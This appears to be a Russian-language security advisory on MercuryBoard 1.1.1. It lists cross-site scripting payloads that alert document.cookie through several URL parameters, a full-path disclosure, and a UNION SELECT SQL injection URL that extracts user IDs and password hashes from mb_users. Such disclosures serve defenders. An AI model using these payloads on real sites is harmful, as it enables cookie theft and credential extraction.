Программа: MercuryBoard 1.1.1
Уязвимость в MercuryBoard позволяет удаленному
пользователю произвести XSS нападение,
выполнить SQL-инъекцию и получить информацию
об установочной директории приложения на
сервере. Уязвимость сущетвуте из-за
недостаточной проверки данных в параметре
‘s’ сценария 'func/pm.php'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере целевого
пользователя.
Пример:
http://[target]/index.php?a=pm&s= '><script>alert(document.cookie)</script>
Недостаточная обработка данных в
параметре ‘i’ сценария 'func/members.php'
позволяте удаленному пользователю
произвести XSS нападение.
Пример:
http://[target]/index.php?a=members&l= '><script>alert(document.cookie)</script>
Также уязвимы другие параметры:
http://[target]/index.php?a='><script>alert(document. cookie)</script
>
http://[target]/index.php?a=post&s='><script> alert(document.cookie)</script>
http://[target]/index.php?a=post&s=reply&t='> <script>alert(document.cookie)</script>
htt p://[target]/index.php?a=pm&s=send&to='> <script>alert(document.cookie)</script>
http://[target]/index.php?a=pm&s=send&to=2 &re='><script>alert(document.cookie)</script>
http://[target]/index.php?a=cp&s='><script> alert(document.cookie)</script>
Удаленный пользователь может получить
информацию об установочной директории на
сервере из-за уязвимости в сценарии 'global.php'.
Пример:
http://[target]/index.php?a=forum&f=2&min=0&n=0
Также уязвимы сценарии:
lib/jpgraph/jpgraph_bar.php
lib/jpgraph/jpgraph_log.php
lib/jpgraph/jpgraph_polar.php
admincp/admin.php
и все сценарии в директории func.
Удаленный авторизованный пользователь
может выполнить произвольные SQL команды на
системе.
Пример:
http://[target]/index.php?a=post&s=reply &t=0%20UNION%20SELECT%20user_id,
%20user_password%20FROM%20mb_users%20/*